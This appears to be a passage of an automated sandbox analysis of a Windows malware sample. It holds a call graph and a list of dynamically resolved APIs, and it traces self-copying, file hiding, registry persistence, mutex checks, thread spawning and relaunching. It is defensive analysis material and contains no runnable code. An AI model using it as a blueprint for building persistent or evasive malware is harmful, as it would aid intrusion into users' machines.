RegOpenKeyExA 47005->47478 47006 40d9aa 47007 40d82d 47006->47007 47314 41a463 47006->47314 47007->46983 47013 40d988 47008->47013 47512 412902 30 API calls 47011->47512 47012 40d9c5 47014 40da18 47012->47014 47331 40697b 47012->47331 47013->47001 47481 412902 30 API calls 47013->47481 47017 401d64 22 API calls 47014->47017 47019 40da21 47017->47019 47028 40da32 47019->47028 47029 40da2d 47019->47029 47021 40e14a 47513 4112b5 64 API calls ___scrt_fastfail 47021->47513 47022 40d9e4 47482 40699d 30 API calls 47022->47482 47023 40d9ee 47027 401d64 22 API calls 47023->47027 47036 40d9f7 47027->47036 47033 401d64 22 API calls 47028->47033 47485 4069ba CreateProcessA CloseHandle CloseHandle ___scrt_fastfail 47029->47485 47030 40d9e9 47483 4064d0 97 API calls 47030->47483 47034 40da3b 47033->47034 47335 41ae08 47034->47335 47036->47014 47039 40da13 47036->47039 47037 40da46 47339 401e18 47037->47339 47484 4064d0 97 API calls 47039->47484 47040 40da51 47343 401e13 47040->47343 47043 40da5a 47044 401d64 22 API calls 47043->47044 47045 40da63 47044->47045 47046 401d64 22 API calls 47045->47046 47047 40da7d 47046->47047 47048 401d64 22 API calls 47047->47048 47049 40da97 47048->47049 47050 401d64 22 API calls 47049->47050 47052 40dab0 47050->47052 47051 40db1d 47053 40db2c 47051->47053 47059 40dcaa ___scrt_fastfail 47051->47059 47052->47051 47054 401d64 22 API calls 47052->47054 47055 401d64 22 API calls 47053->47055 47060 40dbb1 47053->47060 47057 40dac5 _wcslen 47054->47057 47056 40db3e 47055->47056 47058 401d64 22 API calls 47056->47058 47057->47051 47061 401d64 22 API calls 47057->47061 47062 40db50 47058->47062 47488 41265d RegOpenKeyExA RegQueryValueExA RegCloseKey 47059->47488 47083 40dbac ___scrt_fastfail 47060->47083 47063 40dae0 47061->47063 47065 401d64 22 API calls 47062->47065 47067 401d64 22 API calls 47063->47067 47066 40db62 47065->47066 47070 401d64 22 API calls 47066->47070 47068 40daf5 47067->47068 47347 40c89e 47068->47347 47069 40dcef 47071 401d64 22 API calls 47069->47071 47072 40db8b 47070->47072 47073 40dd16 47071->47073 47078 401d64 22 API calls 47072->47078 47489 401f66 47073->47489 47076 401e18 11 API calls 47077 40db14 47076->47077 47080 401e13 11 API calls 47077->47080 47081 40db9c 47078->47081 47080->47051 47404 40bc67 47081->47404 47082 40dd25 47493 4126d2 14 API calls 47082->47493 47083->47060 47486 4128a2 31 API calls 47083->47486 47087 40dd3b 47089 401d64 22 API calls 47087->47089 47088 40dc45 ctype 47091 401d64 22 API calls 47088->47091 47090 40dd47 47089->47090 47494 43a5e7 39 API calls _strftime 47090->47494 47094 40dc5c 47091->47094 47093 40dd54 47095 40dd81 47093->47095 47495 41beb0 86 API calls ___scrt_fastfail 47093->47495 47094->47069 47096 401d64 22 API calls 47094->47096 47101 401f66 28 API calls 47095->47101 47098 40dc7e 47096->47098 47099 41ae08 28 API calls 47098->47099 47103 40dc87 47099->47103 47100 40dd65 CreateThread 47100->47095 47676 41c96f 10 API calls 47100->47676 47102 40dd96 47101->47102 47104 401f66 28 API calls 47102->47104 47487 40e219 109 API calls 47103->47487 47106 40dda5 47104->47106 47496 41a686 79 API calls 47106->47496 47107 40dc8c 47107->47069 47109 40dc93 47107->47109 47109->47007 47110 40ddaa 47111 401d64 22 API calls 47110->47111 47112 40ddb6 47111->47112 47113 401d64 22 API calls 47112->47113 47114 40ddcb 47113->47114 47115 401d64 22 API calls 47114->47115 47116 40ddeb 47115->47116 47497 43a5e7 39 API calls _strftime 47116->47497 47118 40ddf8 47119 401d64 22 API calls 47118->47119 47120 40de03 47119->47120 47121 401d64 22 API calls 47120->47121 47122 40de14 47121->47122 47123 401d64 22 API calls 47122->47123 47124 40de29 47123->47124 47125 401d64 22 API calls 47124->47125 47126 40de3a 47125->47126 47127 40de41 StrToIntA 47126->47127 47498 409517 141 API calls _wcslen 47127->47498 47129 40de53 47130 401d64 22 API calls 47129->47130 47132 40de5c 47130->47132 47131 40dea1 47134 401d64 22 API calls 47131->47134 47132->47131 47499 43360d 22 API calls 3 library calls 47132->47499 47139 40deb1 47134->47139 47135 40de71 47136 401d64 22 API calls 47135->47136 47137 40de84 47136->47137 47140 40de8b CreateThread 47137->47140 47138 40def9 47142 401d64 22 API calls 47138->47142 47139->47138 47500 43360d 22 API calls 3 library calls 47139->47500 47140->47131 47672 419128 102 API calls 2 library calls 47140->47672 47147 40df02 47142->47147 47143 40dec6 47144 401d64 22 API calls 47143->47144 47145 40ded8 47144->47145 47150 40dedf CreateThread 47145->47150 47146 40df6c 47148 401d64 22 API calls 47146->47148 47147->47146 47149 401d64 22 API calls 47147->47149 47152 40df75 47148->47152 47151 40df1e 47149->47151 47150->47138 47677 419128 102 API calls 2 library calls 47150->47677 47154 401d64 22 API calls 47151->47154 47153 40dfba 47152->47153 47156 401d64 22 API calls 47152->47156 47504 41a7a2 29 API calls 47153->47504 47157 40df33 47154->47157 47159 40df8a 47156->47159 47501 40c854 31 API calls 47157->47501 47158 40dfc3 47160 401e18 11 API calls 47158->47160 47164 401d64 22 API calls 47159->47164 47161 40dfce 47160->47161 47163 401e13 11 API calls 47161->47163 47166 40dfd7 CreateThread 47163->47166 47167 40df9f 47164->47167 47165 40df46 47168 401e18 11 API calls 47165->47168 47171 40e004 47166->47171 47172 40dff8 CreateThread 47166->47172 47671 40e54f 82 API calls 47166->47671 47502 43a5e7 39 API calls _strftime 47167->47502 47170 40df52 47168->47170 47173 401e13 11 API calls 47170->47173 47175 40e019 47171->47175 47176 40e00d CreateThread 47171->47176 47172->47171 47673 410f36 138 API calls 47172->47673 47174 40df5b CreateThread 47173->47174 47174->47146 47674 40196b 49 API calls _strftime 47174->47674 47179 40e073 47175->47179 47181 401f66 28 API calls 47175->47181 47176->47175 47675 411524 38 API calls ___scrt_fastfail 47176->47675 47178 40dfac 47503 40b95c 7 API calls 47178->47503 47507 41246e RegOpenKeyExA RegQueryValueExA RegCloseKey 47179->47507 47182 40e046 47181->47182 47505 404c9e 28 API calls 47182->47505 47185 40e08b 47187 40e12a 47185->47187 47189 41ae08 28 API calls 47185->47189 47186 40e053 47188 401f66 28 API calls 47186->47188 47510 40cbac 27 API calls 47187->47510 47190 40e062 47188->47190 47192 40e0a4 47189->47192 47506 41a686 79 API calls 47190->47506 47508 412584 31 API calls 47192->47508 47194 40e12f 47511 413fd4 168 API calls _strftime 47194->47511 47195 40e067 47197 401eea 11 API calls 47195->47197 47197->47179 47199 40e0ba 47200 401e13 11 API calls 47199->47200 47203 40e0c5 47200->47203 47201 40e0ed DeleteFileW 47202 40e0f4 47201->47202 47201->47203 47204 41ae08 28 API calls 47202->47204 47203->47201 47203->47202 47205 40e0db Sleep 47203->47205 47206 40e104 47204->47206 47205->47203 47509 41297a RegOpenKeyExW RegDeleteValueW 47206->47509 47208 40e117 47209 401e13 11 API calls 47208->47209 47210 40e121 47209->47210 47211 401e13 11 API calls 47210->47211 47211->47187 47212->46907 47213->46913 47214->46911 47215->46921 47216->46923 47217->46926 47218->46901 47219->46904 47220->46908 47221->46930 47222->46932 47223->46935 47224->46933 47225->46940 47227 44ddd2 47226->47227 47229 44dddb 47226->47229 47231 44dcc8 48 API calls 5 library calls 47227->47231 47229->46945 47230->46945 47231->47229 47233 41bd22 LoadLibraryA GetProcAddress 47232->47233 47234 41bd12 GetModuleHandleA GetProcAddress 47232->47234 47235 41bd4b 32 API calls 47233->47235 47236 41bd3b LoadLibraryA GetProcAddress 47233->47236 47234->47233 47235->46949 47236->47235 47514 41a63f FindResourceA 47237->47514 47240 43a88c ___std_exception_copy 21 API calls 47241 40e192 ctype 47240->47241 47517 401f86 47241->47517 47244 401eef 11 API calls 47245 40e1b8 47244->47245 47246 401eea 11 API calls 47245->47246 47247 40e1c1 47246->47247 47248 43a88c ___std_exception_copy 21 API calls 47247->47248 47249 40e1d2 ctype 47248->47249 47521 406052 47249->47521 47251 40e205 47251->46951 47253 401fcc 47252->47253 47529 402501 47253->47529 47255 401fea 47255->46954 47276 41afd6 47256->47276 47257 41b046 47258 401eea 11 API calls 47257->47258 47259 41b078 47258->47259 47260 401eea 11 API calls 47259->47260 47262 41b080 47260->47262 47261 41b048 47536 403b60 28 API calls 47261->47536 47265 401eea 11 API calls 47262->47265 47267 40d7c6 47265->47267 47266 41b054 47268 401eef 11 API calls 47266->47268 47277 40e8bd 47267->47277 47270 41b05d 47268->47270 47269 401eef 11 API calls 47269->47276 47271 401eea 11 API calls 47270->47271 47273 41b065 47271->47273 47272 401eea 11 API calls 47272->47276 47537 41bfa9 28 API calls 47273->47537 47276->47257 47276->47261 47276->47269 47276->47272 47534 403b60 28 API calls 47276->47534 47535 41bfa9 28 API calls 47276->47535 47278 40e8ca 47277->47278 47280 40e8da 47278->47280 47538 40200a 11 API calls 47278->47538 47280->46959 47282 40200a 47281->47282 47286 40203a 47282->47286 47539 402654 11 API calls 47282->47539 47284 40202b 47540 4026ba 11 API calls _Deallocate 47284->47540 47286->46961 47288 401d6c 47287->47288 47289 401d74 47288->47289 47541 401fff 22 API calls 47288->47541 47289->46966 47293 404ccb 47292->47293 47542 402e78 47293->47542 47295 404cee 47295->46973 47551 404bc4 47296->47551 47298 405cf4 47298->46976 47300 401efe 47299->47300 47302 401f0a 47300->47302 47560 4021b9 11 API calls 47300->47560 47302->46980 47305 4021b9 47303->47305 47304 4021e8 47304->46982 47305->47304 47561 40262e 11 API calls _Deallocate 47305->47561 47308 401ec9 47307->47308 47309 401ee4 47308->47309 47310 402325 28 API calls 47308->47310 47309->46990 47310->47309 47562 401e8f 47311->47562 47313 40bee1 CreateMutexA GetLastError 47313->47006 47564 41b15b 47314->47564 47319 401eef 11 API calls 47320 41a49f 47319->47320 47321 401eea 11 API calls 47320->47321 47322 41a4a7 47321->47322 47323 41a4fa 47322->47323 47324 412513 31 API calls 47322->47324 47323->47012 47325 41a4cd 47324->47325 47326 41a4d8 StrToIntA 47325->47326 47327 41a4ef 47326->47327 47328 41a4e6 47326->47328 47330 401eea 11 API calls 47327->47330 47572 41c102 22 API calls 47328->47572 47330->47323 47332 40698f 47331->47332 47333 4124b7 3 API calls 47332->47333 47334 406996 47333->47334 47334->47022 47334->47023 47336 41ae1c 47335->47336 47573 40b027 47336->47573 47338 41ae24 47338->47037 47340 401e27 47339->47340 47341 401e33 47340->47341 47582 402121 11 API calls 47340->47582 47341->47040 47345 402121 47343->47345 47344 402150 47344->47043 47345->47344 47583 402718 11 API calls _Deallocate 47345->47583 47348 40c8ba 47347->47348 47349 40c8da 47348->47349 47350 40c90f 47348->47350 47351 40c8d0 47348->47351 47588 41a74b 29 API calls 47349->47588 47354 41b15b GetCurrentProcess 47350->47354 47353 40ca03 GetLongPathNameW 47351->47353 47584 403b40 47353->47584 47357 40c914 47354->47357 47355 40c8e3 47358 401e18 11 API calls 47355->47358 47360 40c918 47357->47360 47361 40c96a 47357->47361 47399 40c8ed 47358->47399 47364 403b40 28 API calls 47360->47364 47363 403b40 28 API calls 47361->47363 47362 403b40 28 API calls 47365 40ca27 47362->47365 47366 40c978 47363->47366 47367 40c926 47364->47367 47591 40cc37 28 API calls 47365->47591 47371 403b40 28 API calls 47366->47371 47372 403b40 28 API calls 47367->47372 47368 401e13 11 API calls 47368->47351 47370 40ca3a 47592 402860 28 API calls 47370->47592 47375 40c98e 47371->47375 47376 40c93c 47372->47376 47374 40ca45 47593 402860 28 API calls 47374->47593 47590 402860 28 API calls 47375->47590 47589 402860 28 API calls 47376->47589 47380 40ca4f 47383 401e13 11 API calls 47380->47383 47381 40c999 47384 401e18 11 API calls 47381->47384 47382 40c947 47385 401e18 11 API calls 47382->47385 47386 40ca59 47383->47386 47387 40c9a4 47384->47387 47388 40c952 47385->47388 47389 401e13 11 API calls 47386->47389 47390 401e13 11 API calls 47387->47390 47391 401e13 11 API calls 47388->47391 47392 40ca62 47389->47392 47393 40c9ad 47390->47393 47394 40c95b 47391->47394 47395 401e13 11 API calls 47392->47395 47396 401e13 11 API calls 47393->47396 47397 401e13 11 API calls 47394->47397 47398 40ca6b 47395->47398 47396->47399 47397->47399 47400 401e13 11 API calls 47398->47400 47399->47368 47401 40ca74 47400->47401 47402 401e13 11 API calls 47401->47402 47403 40ca7d 47402->47403 47403->47076 47405 40bc7a _wcslen 47404->47405 47406 40bc84 47405->47406 47407 40bcce 47405->47407 47409 40bc8d CreateDirectoryW 47406->47409 47408 40c89e 31 API calls 47407->47408 47410 40bce0 47408->47410 47595 40856b 47409->47595 47412 401e18 11 API calls 47410->47412 47421 40bccc 47412->47421 47413 40bca9 47629 4028cf 47413->47629 47415 401e13 11 API calls 47417 40bcf7 47415->47417 47416 40bcb5 47418 401e18 11 API calls 47416->47418 47422 40bd10 47417->47422 47423 40bd2d 47417->47423 47419 40bcc3 47418->47419 47420 401e13 11 API calls 47419->47420 47420->47421 47421->47415 47425 40bb7b 31 API calls 47422->47425 47424 40bd36 CopyFileW 47423->47424 47426 40be07 47424->47426 47427 40bd48 _wcslen 47424->47427 47459 40bd21 47425->47459 47601 40bb7b 47426->47601 47427->47426 47429 40bd64 47427->47429 47430 40bdb7 47427->47430 47433 40c89e 31 API calls 47429->47433 47432 40c89e 31 API calls 47430->47432 47436 40bdbd 47432->47436 47437 40bd6a 47433->47437 47434 40be21 47441 40be2a SetFileAttributesW 47434->47441 47435 40be4d 47438 40be95 CloseHandle 47435->47438 47443 403b40 28 API calls 47435->47443 47439 401e18 11 API calls 47436->47439 47440 401e18 11 API calls 47437->47440 47627 401e07 47438->47627 47444 40bdb1 47439->47444 47445 40bd76 47440->47445 47458 40be39 _wcslen 47441->47458 47447 40be63 47443->47447 47453 401e13 11 API calls 47444->47453 47449 401e13 11 API calls 47445->47449 47446 40beb1 ShellExecuteW 47450 40bec4 47446->47450 47451 40bece ExitProcess 47446->47451 47448 41ae08 28 API calls 47447->47448 47452 40be76 47448->47452 47454 40bd7f 47449->47454 47455 40bed7 CreateMutexA GetLastError 47450->47455 47632 412774 RegCreateKeyW 47452->47632 47456 40bdcf 47453->47456 47457 40856b 28 API calls 47454->47457 47455->47459 47463 40bddb CreateDirectoryW 47456->47463 47460 40bd93 47457->47460 47458->47435 47461 40be4a SetFileAttributesW 47458->47461 47459->47083 47464 4028cf 28 API calls 47460->47464 47461->47435 47466 401e07 47463->47466 47467 40bd9f 47464->47467 47469 40bdeb CopyFileW 47466->47469 47470 401e18 11 API calls 47467->47470 47468 401e13 11 API calls 47468->47438 47469->47426 47471 40bdf8 47469->47471 47472 40bda8 47470->47472 47471->47459 47473 401e13 11 API calls 47472->47473 47473->47444 47474->46967 47475->46977 47477->46998 47479 4124e1 RegQueryValueExA RegCloseKey 47478->47479 47480 41250b 47478->47480 47479->47480 47480->46994 47481->47001 47482->47030 47483->47023 47484->47014 47485->47028 47486->47088 47487->47107 47488->47069 47490 401f6e 47489->47490 47666 402301 47490->47666 47493->47087 47494->47093 47495->47100 47496->47110 47497->47118 47498->47129 47499->47135 47500->47143 47501->47165 47502->47178 47503->47153 47504->47158 47505->47186 47506->47195 47507->47185 47508->47199 47509->47208 47510->47194 47670 419e89 103 API calls 47511->47670 47512->47021 47515 40e183 47514->47515 47516 41a65c LoadResource LockResource SizeofResource 47514->47516 47515->47240 47516->47515 47518 401f8e 47517->47518 47524 402325 47518->47524 47520 401fa4 47520->47244 47522 401f86 28 API calls 47521->47522 47523 406066 47522->47523 47523->47251 47525 40232f 47524->47525 47527 40233a 47525->47527 47528 40294a 28 API calls 47525->47528 47527->47520 47528->47527 47530 40250d 47529->47530 47532 40252b 47530->47532 47533 40261a 28 API calls 47530->47533 47532->47255 47533->47532 47534->47276 47535->47276 47536->47266 47537->47257 47538->47280 47539->47284 47540->47286 47543 402e85 47542->47543 47544 402e98 47543->47544 47546 402ea9 47543->47546 47547 402eae 47543->47547 47549 403445 28 API calls 47544->47549 47546->47295 47547->47546 47550 40225b 11 API calls 47547->47550 47549->47546 47550->47546 47552 404bd0 47551->47552 47555 40245c 47552->47555 47554 404be4 47554->47298 47556 402469 47555->47556 47558 402478 47556->47558 47559 402ad3 28 API calls 47556->47559 47558->47554 47559->47558 47560->47302 47561->47304 47563 401e94 47562->47563 47565 41a471 47564->47565 47566 41b168 GetCurrentProcess 47564->47566 47567 412513 RegOpenKeyExA 47565->47567 47566->47565 47568 412541 RegQueryValueExA RegCloseKey 47567->47568 47569 412569 47567->47569 47568->47569 47570 401f66 28 API calls 47569->47570 47571 41257e 47570->47571 47571->47319 47572->47327 47574 40b02f 47573->47574 47577 40b04b 47574->47577 47576 40b045 47576->47338 47578 40b055 47577->47578 47580 40b060 47578->47580 47581 40b138 28 API calls 47578->47581 47580->47576 47581->47580 47582->47341 47583->47344 47585 403b48 47584->47585 47594 403b7a 28 API calls 47585->47594 47587 403b5a 47587->47362 47588->47355 47589->47382 47590->47381 47591->47370 47592->47374 47593->47380 47594->47587 47596 408577 47595->47596 47638 402ca8 47596->47638 47600 4085a3 47600->47413 47602 40bba1 47601->47602 47603 40bbdd 47601->47603 47656 40b0dd 47602->47656 47604 40bc1e 47603->47604 47606 40b0dd 28 API calls 47603->47606 47607 40bc5f 47604->47607 47610 40b0dd 28 API calls 47604->47610 47609 40bbf4 47606->47609 47607->47434 47607->47435 47612 4028cf 28 API calls 47609->47612 47613 40bc35 47610->47613 47611 4028cf 28 API calls 47614 40bbbd 47611->47614 47615 40bbfe 47612->47615 47616 4028cf 28 API calls 47613->47616 47617 412774 14 API calls 47614->47617 47618 412774 14 API calls 47615->47618 47619 40bc3f 47616->47619 47620 40bbd1 47617->47620 47621 40bc12 47618->47621 47622 412774 14 API calls 47619->47622 47623 401e13 11 API calls 47620->47623 47624 401e13 11 API calls 47621->47624 47625 40bc53 47622->47625 47623->47603 47624->47604 47626 401e13 11 API calls 47625->47626 47626->47607 47628 401e0c 47627->47628 47662 402d8b 47629->47662 47631 4028dd 47631->47416 47633 4127c6 47632->47633 47635 412789 47632->47635 47634 401e13 11 API calls 47633->47634 47636 40be89 47634->47636 47637 4127a2 RegSetValueExW RegCloseKey 47635->47637 47636->47468 47637->47633 47639 402cb5 47638->47639 47640 402cd9 47639->47640 47641 402cc8 47639->47641 47643 402cde 47639->47643 47645 402de3 47640->47645 47649 403374 28 API calls 47641->47649 47643->47640 47650 402f21 11 API calls 47643->47650 47646 402daf 47645->47646 47651 4030f7 47646->47651 47648 402dcd 47648->47600 47649->47640 47650->47640 47652 403101 47651->47652 47654 403115 47652->47654 47655 4036c2 28 API calls 47652->47655 47654->47648 47655->47654 47657 40b0e9 47656->47657 47658 402ca8 28 API calls 47657->47658 47659 40b10c 47658->47659 47660 402de3 28 API calls 47659->47660 47661 40b11f 47660->47661 47661->47611 47663 402d97 47662->47663 47664 4030f7 28 API calls 47663->47664 47665 402dab 47664->47665 47665->47631 47667 40230d 47666->47667 47668 402325 28 API calls 47667->47668 47669 401f80 47668->47669 47669->47082 47678 411637 62 API calls 47673->47678

                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • LoadLibraryA.KERNELBASE(Psapi,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BCF8
                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041BD01
                                                                                                                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD18
                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041BD1B
                                                                                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD2D
                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041BD30
                                                                                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD41
                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041BD44
                                                                                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040D783), ref: 0041BD55
                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041BD58
                                                                                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040D783), ref: 0041BD65
                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041BD68
                                                                                                                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D783), ref: 0041BD75
                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041BD78
                                                                                                                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D783), ref: 0041BD85
                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041BD88
                                                                                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D783), ref: 0041BD99
                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041BD9C
                                                                                                                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D783), ref: 0041BDA9
                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041BDAC
                                                                                                                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D783), ref: 0041BDBD
                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041BDC0
                                                                                                                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D783), ref: 0041BDD1
                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041BDD4
                                                                                                                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040D783), ref: 0041BDE5
                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041BDE8
                                                                                                                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040D783), ref: 0041BDF5
                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041BDF8
                                                                                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040D783), ref: 0041BE06
                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041BE09
                                                                                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(kernel32,GetConsoleWindow,?,?,?,?,0040D783), ref: 0041BE16
                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041BE19
                                                                                                                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040D783), ref: 0041BE2B
                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041BE2E
                                                                                                                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040D783), ref: 0041BE3B
                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041BE3E
                                                                                                                                                                                                                                                                                                • LoadLibraryA.KERNELBASE(Iphlpapi,GetExtendedTcpTable,?,?,?,?,0040D783), ref: 0041BE50
                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041BE53
                                                                                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedUdpTable,?,?,?,?,0040D783), ref: 0041BE60
                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041BE63
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: AddressProc$HandleLibraryLoadModule
                                                                                                                                                                                                                                                                                                • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                                                                                                                                                                                                                                                                                                • API String ID: 384173800-625181639
                                                                                                                                                                                                                                                                                                • Opcode ID: 0789f4e3f810de028ed60e0db8f6a6efc83e65cfda48e5b03c752fe52fb7e632
                                                                                                                                                                                                                                                                                                • Instruction ID: 894fbade80705e672e772900be83df88f70523cf1842e1027a1ce5ee2e2841b6
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0789f4e3f810de028ed60e0db8f6a6efc83e65cfda48e5b03c752fe52fb7e632
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2831EDA0E4031C7ADA107FB69C49E5B7E9CD944B953110827B508D3162FBBDA9809EEE

                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                control_flow_graph 5 40d767-40d7e9 call 41bce3 GetModuleFileNameW call 40e168 call 401fbd * 2 call 41afc3 call 40e8bd call 401d8c call 43e820 22 40d835-40d8fd call 401d64 call 401e8f call 401d64 call 404cbf call 405ce6 call 401eef call 401eea * 2 call 401d64 call 401ebd call 40541d call 401d64 call 404bb1 call 401d64 call 404bb1 5->22 23 40d7eb-40d830 call 40e986 call 401d64 call 401e8f call 40fcba call 40e937 call 40e155 5->23 69 40d950-40d96b call 401d64 call 40b125 22->69 70 40d8ff-40d94a call 4085b4 call 401eef call 401eea call 401e8f call 4124b7 22->70 49 40dc96-40dca7 call 401eea 23->49 79 40d9a5-40d9ac call 40bed7 69->79 80 40d96d-40d98c call 401e8f call 4124b7 69->80 70->69 100 40e134-40e154 call 401e8f call 412902 call 4112b5 70->100 88 40d9b5-40d9bc 79->88 89 40d9ae-40d9b0 79->89 80->79 99 40d98e-40d9a4 call 401e8f call 412902 80->99 93 40d9c0-40d9cc call 41a463 88->93 94 40d9be 88->94 92 40dc95 89->92 92->49 104 40d9d5-40d9d9 93->104 105 40d9ce-40d9d0 93->105 94->93 99->79 108 40da18-40da2b call 401d64 call 401e8f 104->108 109 40d9db call 40697b 104->109 105->104 127 40da32-40daba call 401d64 call 41ae08 call 401e18 call 401e13 call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f 108->127 128 40da2d call 4069ba 108->128 117 40d9e0-40d9e2 109->117 120 40d9e4-40d9e9 call 40699d call 4064d0 117->120 121 40d9ee-40da01 call 401d64 call 401e8f 117->121 120->121 121->108 138 40da03-40da09 121->138 163 40db22-40db26 127->163 164 40dabc-40dad5 call 401d64 call 401e8f call 43a611 127->164 128->127 138->108 140 40da0b-40da11 138->140 140->108 142 40da13 call 4064d0 140->142 142->108 165 40dcaa-40dd01 call 436050 call 4022f8 call 401e8f * 2 call 41265d call 4082d7 163->165 166 40db2c-40db33 163->166 164->163 189 40dad7-40db03 call 401d64 call 401e8f call 401d64 call 401e8f call 40c89e 164->189 220 40dd06-40dd5c call 401d64 call 401e8f call 401f66 call 401e8f call 4126d2 call 401d64 call 401e8f call 43a5e7 165->220 169 40dbb1-40dbbb call 4082d7 166->169 170 40db35-40dba7 call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 40bc67 166->170 179 40dbc0-40dbe4 call 4022f8 call 4338c8 169->179 259 40dbac-40dbaf 170->259 197 40dbf3 179->197 198 40dbe6-40dbf1 call 436050 179->198 234 40db08-40db1d call 401e18 call 401e13 189->234 203 40dbf5-40dc6a call 401e07 call 43e349 call 4022f8 call 401e8f call 4022f8 call 401e8f call 4128a2 call 4338d1 call 401d64 call 40b125 197->203 198->203 203->220 274 40dc70-40dc91 call 401d64 call 41ae08 call 40e219 203->274 272 40dd79-40dd7b 220->272 273 40dd5e 220->273 234->163 259->179 276 40dd81 272->276 277 40dd7d-40dd7f 272->277 275 40dd60-40dd77 call 41beb0 CreateThread 273->275 274->220 292 40dc93 274->292 280 40dd87-40de66 call 401f66 * 2 call 41a686 call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 43a5e7 call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f StrToIntA call 409517 call 401d64 call 401e8f 275->280 276->280 277->275 330 40dea1 280->330 331 40de68-40de9f call 43360d call 401d64 call 401e8f CreateThread 280->331 292->92 332 40dea3-40debb call 401d64 call 401e8f 330->332 331->332 342 40def9-40df0c call 401d64 call 401e8f 332->342 343 40debd-40def4 call 43360d call 401d64 call 401e8f CreateThread 332->343 353 40df6c-40df7f call 401d64 call 401e8f 342->353 354 40df0e-40df67 call 401d64 call 401e8f call 